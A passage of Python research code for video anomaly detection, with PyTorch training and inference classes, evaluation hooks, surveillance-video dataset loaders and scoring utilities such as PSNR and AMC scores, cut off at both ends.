self.model[k].load_state_dict(temp[k[0]])
else:
self.model.load_state_dict(torch.load(self.model_path))
def data_parallel(self, model):
'''
Data parallel the model
'''
self.logger.info('<!_!> ==> Data Parallel')
gpus = [int(i) for i in self.config.SYSTEM.gpus]
model_parallel = torch.nn.DataParallel(model, device_ids=gpus).cuda()
return model_parallel
def inference(self, current_step):
if self.mode == 'dataset':
metric = self.evaluate()
elif self.mode == 'other':
self.get_result()
else:
raise Exception('Wrong inference mode')
def get_result(self):
'''
Get the results for one image
'''
raise Exception('Need to implement the get_result function, return the score')
def extract_feature(self):
'''
Get the feature of input
'''
pass
def save(self):
'''
Save the results or the feature
'''
pass
```
#### File: core/hook/stae_hooks.py
```python
import os
import pickle
import cv2
import numpy as np
import torch
from torch.utils.data import DataLoader
from collections import OrderedDict
import matplotlib.pyplot as plt
from tsnecuda import TSNE
from scipy.ndimage import gaussian_filter1d
from .abstract.abstract_hook import HookBase
from lib.datatools.evaluate.utils import reconstruction_loss
from lib.datatools.evaluate.gtloader import GroundTruthLoader
# from lib.datatools.evaluate import eval_api
from lib.core.utils import tsne_vis, tensorboard_vis_images, save_results
HOOKS = ['STAEEvaluateHook']
class STAEEvaluateHook(HookBase):
def after_step(self, current_step):
acc = 0.0
if current_step % self.trainer.eval_step == 0 and current_step != 0:
with torch.no_grad():
acc = self.evaluate(current_step)
if acc > self.trainer.accuarcy:
self.trainer.accuarcy = acc
# save the model & checkpoint
self.trainer.save(current_step, best=True)
elif current_step % self.trainer.save_step == 0 and current_step != 0:
# save the checkpoint
self.trainer.save(current_step)
self.trainer.logger.info('LOL==>the accuracy is not imporved in epcoh{} but save'.format(current_step))
else:
pass
else:
pass
def inference(self):
# import ipdb; ipdb.set_trace()
self.trainer.set_requires_grad(self.trainer.STAE, False)
acc = self.evaluate(0)
self.trainer.logger.info(f'The inference metric is:{acc:.3f}')
def evaluate(self, current_step):
'''
Evaluate the results of the model
!!! Will change, e.g. accuracy, mAP.....
!!! Or can call other methods written by the official
'''
self.trainer.STAE.eval()
tb_writer = self.trainer.kwargs['writer_dict']['writer']
global_steps = self.trainer.kwargs['writer_dict']['global_steps_{}'.format(self.trainer.kwargs['model_type'])]
frame_num = self.trainer.config.DATASET.test_clip_length
clip_step = self.trainer.config.DATASET.test_clip_step
psnr_records=[]
score_records=[]
# total = 0
num_videos = 0
random_video_sn = torch.randint(0, len(self.trainer.test_dataset_keys), (1,))
# calc the score for the test dataset
for sn, video_name in enumerate(self.trainer.test_dataset_keys):
num_videos += 1
# need to improve
dataset = self.trainer.test_dataset_dict[video_name]
len_dataset = dataset.pics_len
# test_iters = len_dataset - frame_num + 1
test_iters = len_dataset // clip_step
test_counter = 0
data_loader = DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=1)
vis_range = range(int(len_dataset*0.5), int(len_dataset*0.5 + 5))
# scores = np.empty(shape=(len_dataset,),dtype=np.float32)
scores = torch.zeros(len_dataset)
# scores = [0.0 for i in range(len_dataset)]
for clip_sn, test_input in enumerate(data_loader):
test_target = test_input.cuda()
time_len = test_input.shape[2]
output, pred = self.trainer.STAE(test_target)
clip_score = reconstruction_loss(output, test_target)
# score = np.array(score.tolist() * time_len)
if len_dataset < (test_counter+1) * time_len:
# import ipdb; ipdb.set_trace()
clip_score = clip_score[:,0:len_dataset-(test_counter)*time_len]
if len(clip_score.shape) >= 2:
clip_score = clip_score.sum(dim=0)
try:
scores[test_counter*time_len:(test_counter + 1)*time_len] = clip_score.squeeze(0)
except:
import ipdb; ipdb.set_trace()
# scores[test_counter+frame_num-1] = score
# import ipdb; ipdb.set_trace()
test_counter += 1
if sn == random_video_sn and (clip_sn in vis_range):
vis_objects = OrderedDict()
vis_objects['stae_eval_clip'] = test_target.detach()
vis_objects['stae_eval_clip_hat'] = output.detach()
tensorboard_vis_images(vis_objects, tb_writer, global_steps, normalize=self.trainer.val_normalize, mean=self.trainer.val_mean, std=self.trainer.val_std)
if test_counter >= test_iters:
# import ipdb; ipdb.set_trace()
# import ipdb; ipdb.set_trace()
# scores[:frame_num-1]=(scores[frame_num-1],) # fix the bug: TypeError: can only assign an iterable
smax = max(scores)
smin = min(scores)
# normal_scores = np.array([(1.0 - np.divide(s-smin, smax)) for s in scores])
normal_scores = (1.0 - torch.div(scores-smin, smax)).detach().cpu().numpy()
score_records.append(normal_scores)
print(f'finish test video set {video_name}')
break
self.trainer.pkl_path = save_results(self.trainer.config, self.trainer.logger, verbose=self.trainer.verbose, config_name=self.trainer.config_name, current_step=current_step, time_stamp=self.trainer.kwargs["time_stamp"],score=score_records)
results = self.trainer.evaluate_function(self.trainer.pkl_path, self.trainer.logger, self.trainer.config, self.trainer.config.DATASET.score_type)
self.trainer.logger.info(results)
tb_writer.add_text('amc: AUC of ROC curve', f'auc is {results.auc}',global_steps)
return results.auc
def get_stae_hooks(name):
if name in HOOKS:
t = eval(name)()
else:
raise Exception('The hook is not in amc_hooks')
return t
```
#### File: lib/core/ocae.py
```python
import warnings
warnings.filterwarnings('ignore')
import os
import pickle
import math
import torch
import time
import numpy as np
from PIL import Image
from collections import OrderedDict
from torch.utils.data import DataLoader
import torchvision.transforms as T
import torchvision.transforms.functional as tf
from lib.core.engine.default_engine import DefaultTrainer, DefaultInference
from lib.core.utils import AverageMeter, multi_obj_grid_crop, frame_gradient, get_batch_dets, tensorboard_vis_images
from lib.datatools.evaluate.utils import psnr_error
class Trainer(DefaultTrainer):
NAME = ["OCAE.TRAIN"]
def __init__(self, *defaults, **kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model:{'Generator':net_g, 'Driscriminator':net_d, 'FlowNet':net_flow}
1->train_dataloader: the dataloader
2->val_dataloader: the dataloader
3->optimizer:{'optimizer_g':op_g, 'optimizer_d'}
4->loss_function: {'g_adverserial_loss':.., 'd_adverserial_loss':..., 'gradient_loss':.., 'opticalflow_loss':.., 'intentsity_loss':.. }
5->logger: the logger of the whole training process
6->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
pertrain(bool): True-> use the pretarin model
extra param:
test_dataset_keys: the dataset keys of each video
test_dataset_dict: the dataset dict of whole test videos
'''
self._hooks = []
self._register_hooks(kwargs['hooks'])
# logger & config
self.logger = defaults[5]
self.config = defaults[6]
model = defaults[0]
# basic things
if kwargs['parallel']:
self.A = self.data_parallel(model['A'])
self.B = self.data_parallel(model['B'])
self.C = self.data_parallel(model['C'])
self.Detector = self.data_parallel(model['Detector'])
else:
self.A = model['A'].cuda()
self.B = model['B'].cuda()
self.C = model['C'].cuda()
self.Detector = model['Detector'].cuda()
if kwargs['pretrain']:
self.load_pretrain()
self.train_dataloader = defaults[1]
self._train_loader_iter = iter(self.train_dataloader)
self.val_dataloader = defaults[2]
self._val_loader_iter = iter(self.val_dataloader)
# get the optimizer
optimizer = defaults[3]
self.optim_ABC = optimizer['optimizer_abc']
# get the loss_fucntion
loss_function = defaults[4]
self.a_loss = loss_function['A_loss']
self.b_loss = loss_function['B_loss']
self.c_loss = loss_function['C_loss']
# basic meter
self.batch_time = AverageMeter()
self.data_time = AverageMeter()
self.loss_meter_A = AverageMeter()
self.loss_meter_B = AverageMeter()
self.loss_meter_C = AverageMeter()
self.loss_meter_ABC = AverageMeter()
self.psnr = AverageMeter()
# others
self.verbose = kwargs['verbose']
self.accuarcy = 0.0 # to store the accuracy varies from epoch to epoch
self.config_name = kwargs['config_name']
self.kwargs = kwargs
self.train_normalize = self.config.ARGUMENT.train.normal.use
self.train_mean = self.config.ARGUMENT.train.normal.mean
self.train_std = self.config.ARGUMENT.train.normal.std
self.val_normalize = self.config.ARGUMENT.train.normal.use
self.val_mean = self.config.ARGUMENT.train.normal.mean
self.val_std = self.config.ARGUMENT.train.normal.std
# self.total_steps = len(self.train_dataloader)
self.result_path = ''
self.log_step = self.config.TRAIN.log_step # how many the steps, we will show the information
self.eval_step = self.config.TRAIN.eval_step
self.vis_step = self.config.TRAIN.vis_step # how many the steps, we will vis
self.save_step = self.config.TRAIN.save_step # save the model whatever the acc of the model
self.max_steps = self.config.TRAIN.max_steps
# self.testing_data_folder = self.config.DATASET.test_path
self.test_dataset_keys = kwargs['test_dataset_keys']
self.test_dataset_dict = kwargs['test_dataset_dict']
self.cluster_dataset_keys = kwargs['cluster_dataset_keys']
self.cluster_dataset_dict = kwargs['cluster_dataset_dict']
self.evaluate_function = kwargs['evaluate_function']
# hypyer-parameters of loss
self.loss_lamada = kwargs['loss_lamada']
# the lr scheduler
lr_scheduler_dict = kwargs['lr_scheduler_dict']
self.lr_abc = lr_scheduler_dict['optimizer_abc_scheduler']
if self.config.RESUME.flag:
self.resume()
if self.config.FINETUNE.flag:
self.fine_tune()
def train(self,current_step):
# Pytorch [N, C, D, H, W]
# initialize
start = time.time()
self.A.train()
self.B.train()
self.C.train()
self.Detector.eval()
writer = self.kwargs['writer_dict']['writer']
global_steps = self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])]
# get the data
data, _ = next(self._train_loader_iter) # the core for dataloader
self.data_time.update(time.time() - start)
# base on the D to get each frame
# in this method, D = 3 and not change
future = data[:, :, -1, :, :].cuda() # t+1 frame
current = data[:, :, 1, :, :].cuda() # t frame
past = data[:, :, 0, :, :].cuda() # t-1 frame
bboxs = get_batch_dets(self.Detector, current)
# this method is based on the objects to train the model insted of frames
for index, bbox in enumerate(bboxs):
if bbox.numel() == 0:
bbox = bbox.new_zeros([1, 4])
# get the crop objects
input_currentObject_B, _ = multi_obj_grid_crop(current[index], bbox)
future_object, _ = multi_obj_grid_crop(future[index], bbox)
future2current = torch.stack([future_object, input_currentObject_B], dim=1)
past_object, _ = multi_obj_grid_crop(past[index], bbox)
current2past = torch.stack([input_currentObject_B, past_object], dim=1)
_, _, input_objectGradient_A = frame_gradient(future2current)
input_objectGradient_A = input_objectGradient_A.sum(1)
_, _, input_objectGradient_C = frame_gradient(current2past)
input_objectGradient_C = input_objectGradient_C.sum(1)
# import ipdb; ipdb.set_trace()
# True Process =================Start===================
_, output_recGradient_A = self.A(input_objectGradient_A)
_, output_recObject_B = self.B(input_currentObject_B)
_, output_recGradient_C = self.C(input_objectGradient_C)
# import ipdb; ipdb.set_trace()
loss_A = self.a_loss(output_recGradient_A, input_objectGradient_A)
loss_B = self.b_loss(output_recObject_B, input_currentObject_B)
loss_C = self.c_loss(output_recGradient_C, input_objectGradient_C)
loss_all = self.loss_lamada['A_loss'] * loss_A + self.loss_lamada['B_loss'] * loss_B + self.loss_lamada['C_loss'] * loss_C
self.optim_ABC.zero_grad()
loss_all.backward()
self.optim_ABC.step()
# record
self.loss_meter_ABC.update(loss_all.detach())
if self.config.TRAIN.general.scheduler.use:
self.lr_abc.step()
# ======================End==================
self.batch_time.update(time.time() - start)
if (current_step % self.log_step == 0):
msg = 'Step: [{0}/{1}]\t' \
'Type: {cae_type}\t' \
'Time: {batch_time.val:.2f}s ({batch_time.avg:.2f}s)\t' \
'Speed: {speed:.1f} samples/s\t' \
'Data: {data_time.val:.2f}s ({data_time.avg:.2f}s)\t' \
'Loss_ABC: {losses_ABC.val:.5f} ({losses_ABC.avg:.5f})\t'.format(current_step, self.max_steps, cae_type=self.kwargs['model_type'], batch_time=self.batch_time, speed=self.config.TRAIN.batch_size/self.batch_time.val, data_time=self.data_time,losses_ABC=self.loss_meter_ABC)
self.logger.info(msg)
writer.add_scalar('Train_loss_ABC', self.loss_meter_ABC.val, global_steps)
if (current_step % self.vis_step == 0):
vis_objects = OrderedDict()
vis_objects['train_input_objectGradient_A'] = input_objectGradient_A.detach()
vis_objects['train_input_currentObject_B'] = input_currentObject_B.detach()
vis_objects['train_input_objectGradient_C'] = input_objectGradient_C.detach()
vis_objects['train_output_recGradient_A'] = output_recGradient_A.detach()
vis_objects['train_output_recObject_B'] = output_recObject_B.detach()
vis_objects['train_output_recGradient_C'] = output_recGradient_C.detach()
tensorboard_vis_images(vis_objects, writer, global_steps, self.train_normalize, self.train_mean, self.train_std)
global_steps += 1
# reset start
start = time.time()
self.saved_model = {'A':self.A, 'B':self.B, 'C':self.C}
self.saved_optimizer = {'optim_ABC': self.optim_ABC}
self.saved_loss = {'loss_ABC':self.loss_meter_ABC.val}
self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])] = global_steps
def mini_eval(self, current_step):
if current_step % self.config.TRAIN.mini_eval_step != 0:
return
temp_meter_A = AverageMeter()
temp_meter_B = AverageMeter()
temp_meter_C = AverageMeter()
self.A.eval()
self.B.eval()
self.C.eval()
self.Detector.eval()
for data, _ in self.val_dataloader:
# base on the D to get each frame
# in this method, D = 3 and not change
future_mini = data[:, :, -1, :, :].cuda() # t+1 frame
current_mini = data[:, :, 1, :, :].cuda() # t frame
past_mini = data[:, :, 0, :, :].cuda() # t-1 frame
bboxs_mini = get_batch_dets(self.Detector, current_mini)
for index, bbox in enumerate(bboxs_mini):
if bbox.numel() == 0:
bbox = bbox.new_zeros([1, 4])
# get the crop objects
input_currentObject_B, _ = multi_obj_grid_crop(current_mini[index], bbox)
future_object, _ = multi_obj_grid_crop(future_mini[index], bbox)
future2current = torch.stack([future_object, input_currentObject_B], dim=1)
past_object, _ = multi_obj_grid_crop(past_mini[index], bbox)
current2past = torch.stack([input_currentObject_B, past_object], dim=1)
_, _, input_objectGradient_A = frame_gradient(future2current)
input_objectGradient_A = input_objectGradient_A.sum(1)
_, _, input_objectGradient_C = frame_gradient(current2past)
input_objectGradient_C = input_objectGradient_C.sum(1)
_, output_recGradient_A = self.A(input_objectGradient_A)
_, output_recObject_B = self.B(input_currentObject_B)
_, output_recGradient_C = self.C(input_objectGradient_C)
psnr_A = psnr_error(output_recGradient_A.detach(), input_objectGradient_A)
psnr_B = psnr_error(output_recObject_B.detach(), input_currentObject_B)
psnr_C = psnr_error(output_recGradient_C.detach(), input_objectGradient_C)
temp_meter_A.update(psnr_A.detach())
temp_meter_B.update(psnr_B.detach())
temp_meter_C.update(psnr_C.detach())
self.logger.info(f'&^*_*^& ==> Step:{current_step}/{self.max_steps} the A PSNR is {temp_meter_A.avg:.2f}, the B PSNR is {temp_meter_B.avg:.2f}, the C PSNR is {temp_meter_C.avg:.2f}')
class Inference(DefaultInference):
NAME = ["OCAE.INFERENCE"]
def __init__(self, *defaults,**kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->model_path: the path of the model path
2->val_dataloader: the dataloader to inference
3->logger: the logger of the whole process
4->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
pertrain(bool): True-> use the pretarin model
mode(str): 'dataset' -> the data will use the dataloder to pass in(dicard, becasue we will use the dataset to get all I need)
'''
self._hooks = []
self._register_hooks(kwargs['hooks'])
self.logger = defaults[3]
self.config = defaults[4]
self.model_path = defaults[1]
save_model = torch.load(self.model_path)
model = defaults[0]
if kwargs['parallel']:
self.A = self.data_parallel(model['A'])
self.B = self.data_parallel(model['B'])
self.C = self.data_parallel(model['C'])
self.Detector = self.data_parallel(model['Detector'])
else:
self.A = model['A'].cuda()
self.B = model['B'].cuda()
self.C = model['C'].cuda()
self.Detector = model['Detector'].cuda()
# self.load()
self.verbose = kwargs['verbose']
self.kwargs = kwargs
self.config_name = kwargs['config_name']
self.normalize = self.config.ARGUMENT.val.normal.use
self.mean = self.config.ARGUMENT.val.normal.mean
self.std = self.config.ARGUMENT.val.normal.std
# self.mode = kwargs['mode']
self.test_dataset_keys = kwargs['test_dataset_keys']
self.test_dataset_dict = kwargs['test_dataset_dict']
self.test_dataset_keys_w = kwargs['test_dataset_keys_w']
self.test_dataset_dict_w = kwargs['test_dataset_dict_w']
self.metric = 0.0
self.evaluate_function = kwargs['evaluate_function']
def inference(self):
for h in self._hooks:
h.inference()
```
#### File: lib/datatools/build_evaluate.py
```python
from lib.datatools.evaluate.eval_function import eval_functions
class EvaluateAPI(object):
def __init__(self, cfg, logger):
self.cfg = cfg
self.logger = logger
def __call__(self, eval_function_type):
assert eval_function_type in eval_functions, f'there is no type of evaluation {eval_function_type}, please check {eval_functions.keys()}'
self.logger.info(f'==> Using the eval function: {eval_function_type}')
t = eval_functions[eval_function_type]
return t
```
#### File: datatools/dataclass/avenue_ped_shanghai.py
```python
import torch
import numpy as np
import cv2
from collections import OrderedDict
import glob
import os
from torch.utils.data import Dataset
from lib.datatools.abstract.anomaly_video_dataset import AbstractVideoAnomalyDataset
from lib.datatools.abstract.tools import ImageLoader, VideoLoader
from colorama import init,Fore
init(autoreset=True)
class AvenuePedShanghai(AbstractVideoAnomalyDataset):
_NAME = 'AvenuePedShanghai Dataset'
def custom_setup(self):
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
print(f'The read format of train dataset is {self.cfg.DATASET.read_format} in {self._NAME}')
def _get_frames(self, indice):
key = list(self.videos_keys)[indice]
cusrsor = self.videos[key]['cursor']
if (cusrsor + self.clip_length) > self.videos[key]['length']:
cusrsor = 0
start = cusrsor
video_clip, video_clip_original = self.video_loader.read(self.videos[key]['frames'], start, start+self.clip_length, clip_length=self.clip_length,step=self.frame_step)
self.videos[key]['cursor'] = cusrsor + self.clip_step
return video_clip, video_clip_original
def get_image(self, image_name):
# keep for debug
image = self.image_loader.read(image_name)
return image
class AvenuePedShanghaiOneVideo(AbstractVideoAnomalyDataset):
'''
The only get the one video, not whole dataset.
So we wil use it for each video in whole video
'''
_NAME = 'AvenuePedShanghaiOneVideo Dataset'
def __init__(self, dataset_folder, clip_length, frame_step, clip_step=1, transforms=None, is_training=True, one_video=True, cfg=None):
super(AvenuePedShanghaiOneVideo, self).__init__(dataset_folder, clip_length, frame_step=frame_step,clip_step=clip_step, transforms=transforms, is_training=is_training, one_video=one_video, cfg=cfg)
def custom_setup(self):
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
def __len__(self):
return self.pics_len
def _get_frames(self, indice):
start = (indice * self.clip_step) % self.pics_len
if start + self.clip_length >= self.pics_len:
end = self.pics_len - 1
else:
end = start + self.clip_length
video_clip, video_clip_original = self.video_loader.read(self.videos['frames'], start, end, clip_length=self.clip_length, step=self.frame_step)
return video_clip, video_clip_original
def get_image(self,name):
# keep for debug
image = self.image_loader.read(name)
return image
class MiniAvenuePedShanghai(AbstractVideoAnomalyDataset):
_NAME = 'MiniAvenuePedShanghai Dataset'
def custom_setup(self):
# self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format,transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.image_loader = ImageLoader(read_format=self.cfg.DATASET.read_format, channel_num=self.cfg.DATASET.channel_num, channel_name=self.cfg.DATASET.channel_name)
self.video_loader = VideoLoader(self.image_loader, params=self.aug_params, transforms=self.transforms, normalize=self.normal, mean=self.normal_mean, std=self.normal_std)
self.video_nums = len(self.videos_keys)
def _get_frames(self, indice):
temp = indice % self.video_nums
key = list(self.videos_keys)[temp]
rng = np.random.RandomState(2020)
# import ipdb; ipdb.set_trace()
start = rng.randint(0, self.videos[key]['length'] - self.clip_length)
video_clip, video_clip_original = self.video_loader.read(self.videos[key]['frames'], start, start+self.clip_length, clip_length=self.clip_length, step=self.clip_step)
return video_clip, video_clip_original
def __len__(self):
return self.cfg.DATASET.mini_dataset.samples
def get_image(self, image_name):
image = self.image_loader.read(image_name)
return image
# -----------------Functions Part-------------------------
def _get_test_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.test_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_test_folder = os.path.join(cfg.DATASET.test_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_test_folder, clip_length=cfg.DATASET.test_clip_length, clip_step=cfg.DATASET.test_clip_step, frame_step=cfg.DATASET.test_frame_step,transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def _get_train_w_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.train_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_test_folder = os.path.join(cfg.DATASET.train_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_test_folder, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def _get_cluster_dataset(cfg, aug):
dataset_list = OrderedDict()
video_dirs = os.listdir(cfg.DATASET.train_path)
video_dirs.sort()
for t_dir in video_dirs:
_temp_train_folder = os.path.join(cfg.DATASET.train_path, t_dir)
dataset = AvenuePedShanghaiOneVideo(_temp_train_folder, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,is_training=True, transforms=aug, cfg=cfg)
dataset_list[t_dir] = dataset
video_keys = list(dataset_list.keys())
return (dataset_list, video_keys)
def get_avenue_ped_shanghai(cfg, flag, aug):
'''
Using the function to register the Dataset
'''
if flag == 'train':
t = AvenuePedShanghai(cfg.DATASET.train_path, clip_length=cfg.DATASET.train_clip_length, clip_step=cfg.DATASET.train_clip_step, frame_step=cfg.DATASET.train_frame_step,transforms=aug, cfg=cfg)
elif flag == 'val':
t = MiniAvenuePedShanghai(cfg.DATASET.test_path, clip_length=cfg.DATASET.test_clip_length, clip_step=cfg.DATASET.test_clip_step, frame_step=cfg.DATASET.test_frame_step, transforms=aug, cfg=cfg)
print(Fore.RED + 'Using the mini dataset!!!!')
elif flag == 'test':
t = _get_test_dataset(cfg, aug)
elif flag == 'train_w':
t = _get_train_w_dataset(cfg, aug)
elif flag == 'cluster_train':
t = _get_cluster_dataset(cfg, aug)
return t
if __name__ == '__main__':
import ipdb; ipdb.set_trace()
```
#### File: datatools/evaluate/utils.py
```python
import numpy as np
import os
import pickle
import torch
from collections import OrderedDict
from .gtloader import GroundTruthLoader
from scipy.ndimage import gaussian_filter1d
def load_pickle_results(loss_file, cfg):
with open(loss_file, 'rb') as reader:
# results {
# 'dataset': the name of dataset
# 'psnr': the psnr of each testing videos,
# 'flow': [],
# 'names': [],
# 'diff_mask': [],
# 'score': the score of each testing videos
# 'num_videos': the number of the videos
# }
# psnr_records['psnr'] is np.array, shape(#videos)
# psnr_records[0] is np.array ------> 01.avi
# psnr_records[1] is np.array ------> 02.avi
# ......
# psnr_records[n] is np.array ------> xx.avi
results = pickle.load(reader)
dataset = results['dataset']
psnr_records = results['psnr']
score_records = results['score']
num_videos = results['num_videos']
# import ipdb; ipdb.set_trace()
if cfg.DATASET.smooth.guassian:
score_records = results['score_smooth']
psnr_records = results['psnr_smooth']
# new_score = []
# for index, item in enumerate(score):
# temp = gaussian_filter1d(score[index], cfg.DATASET.smooth.guassian_sigma)
# new_score.append(temp)
# print(f'Smooth the score with sigma:{cfg.DATASET.smooth.guassian_sigma}')
else:
score_records = results['score']
psnr_records = results['psnr']
# score = np.array(new_score)
assert dataset == cfg.DATASET.name, f'The dataset are not match, Result:{dataset}, cfg:{cfg.DATASET.name}'
# load ground truth
gt_loader = GroundTruthLoader(cfg)
# gt = gt_loader(dataset=dataset)
gt = gt_loader()
assert num_videos == len(gt), f'the number of saved videos does not match the ground truth, {num_videos} != {len(gt)}'
return dataset, psnr_records, score_records, gt, num_videos
def psnr_error(gen_frames, gt_frames, max_val_hat=1.0):
"""
Computes the Peak Signal to Noise Ratio error between the generated images and the ground
truth images.
@param gen_frames: A tensor of shape [batch_size, height, width, 3]. The frames generated by the
generator model.
@param gt_frames: A tensor of shape [batch_size, height, width, 3]. The ground-truth frames for
each frame in gen_frames.
@return: A scalar tensor. The mean Peak Signal to Noise Ratio error over each frame in the
batch.
"""
gen_frames = gen_frames.detach().cpu()
gt_frames = gt_frames.detach().cpu()
batch_num = gen_frames.shape[0]
batch_errors = 0.0
for i in range(0, batch_num):
num_pixels = gen_frames[i].numel()
# max_val_hat = gen_frames[i].max()
max_val = gt_frames[i].max()
square_diff = (gt_frames[i] - gen_frames[i])**2
log_value = torch.log10(max_val ** 2 / ((1. / num_pixels) * torch.sum(square_diff)))
image_errors = 10 * log_value
batch_errors += image_errors
batch_errors = torch.div(batch_errors, batch_num)
return batch_errors
def simple_diff(frame_true, frame_hat, flow_true, flow_hat, aggregation=False):
"""
"""
assert frame_true.shape == frame_hat.shape
assert flow_true.shape == flow_hat.shape
frame_true = frame_true.squeeze(0).detach()
frame_hat = frame_hat.squeeze(0).detach()
flow_true = flow_true.squeeze(0).detach()
flow_hat = flow_hat.squeeze(0).detach()
loss_appe = (frame_true-frame_hat)**2
loss_flow = (flow_true-flow_hat)**2
if aggregation:
loss_appe = torch.mean(loss_appe)
loss_flow = torch.mean(loss_flow)
return loss_appe, loss_flow
def find_max_patch(diff_map_appe, diff_map_flow, kernel_size=16, stride=4, aggregation=True):
'''
kernel size = window size
'''
# max_pool = torch.nn.MaxPool2d(kernel_size=kernel_size, stride=stride)
avg_pool = torch.nn.AvgPool2d(kernel_size=kernel_size, stride=stride)
max_patch_appe = avg_pool(diff_map_appe)
max_patch_flow = avg_pool(diff_map_flow)
# import ipdb; ipdb.set_trace()
assert len(max_patch_appe.shape) == 3, f'the shape of max_patch_appe is {max_patch_appe.shape}'
assert len(max_patch_flow.shape) == 3, f'the shape of max_patch_flow is {max_patch_flow.shape}'
if aggregation:
# Will sum the channel dim
max_patch_appe = torch.mean(max_patch_appe, dim=0)
max_patch_flow = torch.mean(max_patch_flow, dim=0)
max_appe_value = torch.max(max_patch_appe)
max_flow_value = torch.max(max_patch_flow)
# max_val_flow_std = 0.0
# max_val_appe_std = 0.0
# pos_flow_std = [0, 0]
# pos_appe_std = [0, 0]
# for i in range(0, diff_map_flow.shape[0]-kernel_size, stride):
# for j in range(0, diff_map_flow.shape[1]-kernel_size, stride):
# curr_std_flow = torch.std(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_mean = np.mean(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_std_appe = torch.std(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # curr_mean_appe = np.mean(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # if curr_mean > max_val_mean:
# # max_val_mean = curr_mean
# # std_1 = curr_std
# # pos_1 = [i, j]
# # std_appe_1 = curr_std_appe
# # mean_appe_1 = curr_mean_appe
# if curr_std_flow > max_val_flow_std:
# max_val_flow_std = curr_std_flow
# # mean_2 = curr_mean
# pos_flow_std = [i, j]
# # std_appe_2 = curr_std_appe
# # mean_appe_2 = curr_mean_appe
# for i in range(0, diff_map_appe.shape[0]-kernel_size, stride):
# for j in range(0, diff_map_appe.shape[1]-kernel_size, stride):
# # curr_std_flow = torch.std(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# # curr_mean = np.mean(diff_map_flow[i:i+kernel_size, j:j+kernel_size])
# curr_std_appe = torch.std(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # curr_mean_appe = np.mean(diff_map_appe[i:i+kernel_size, j:j+kernel_size])
# # if curr_mean > max_val_mean:
# # max_val_mean = curr_mean
# # std_1 = curr_std
# # pos_1 = [i, j]
# # std_appe_1 = curr_std_appe
# # mean_appe_1 = curr_mean_appe
# if curr_std_appe > max_val_appe_std:
# max_val_appe_std = curr_std_appe
# # mean_2 = curr_mean
# pos_appe_std = [i, j]
# # std_appe_2 = curr_std_appe
# # mean_appe_2 = curr_mean_appe
app_h, app_w = torch.where(torch.eq(max_patch_appe, max_appe_value))
flow_h, flow_w = torch.where(torch.eq(max_patch_flow, max_flow_value))
max_appe_final = max_appe_value
max_flow_final = max_flow_value
# max_appe_final = torch.div(max_appe_value, kernel_size**2)
# max_flow_final = torch.div(max_flow_value, kernel_size**2)
# import ipdb; ipdb.set_trace()
# return max_patch_appe, max_patch_flow
return max_appe_final, max_flow_final, (app_h, app_w), (flow_h, flow_w)
# return max_val_appe_std, max_val_flow_std, (app_h, app_w), (flow_h, flow_w)
def calc_w(w_dict):
wf = 0.0
wi = 0.0
n = 0
for key in w_dict.keys():
# n += w_dict[key][0]
n += 1
wf += w_dict[key][1]
wi += w_dict[key][2]
# import ipdb; ipdb.set_trace()
wf = torch.div(1.0, torch.div(wf, n))
wi = torch.div(1.0, torch.div(wi, n))
return wf, wi
def amc_normal_score(wf, sf, wi, si, lambada_s=0.2):
final_score = torch.log(wf * sf) + lambada_s * torch.log(wi*si)
return final_score
def amc_score(frame, frame_hat, flow, flow_hat, wf, wi, kernel_size=16, stride=4, lambada_s=0.2):
'''
wf, wi is different from videos
'''
loss_appe, loss_flow = simple_diff(frame, frame_hat, flow, flow_hat)
max_patch_appe, max_patch_flow, app_cord, flow_crod = find_max_patch(loss_appe, loss_flow, kernel_size=kernel_size, stride=stride)
final_score = amc_normal_score(wf, max_patch_appe, wi, max_patch_flow, lambada_s=lambada_s)
return final_score, app_cord, flow_crod
def oc_score(raw_data):
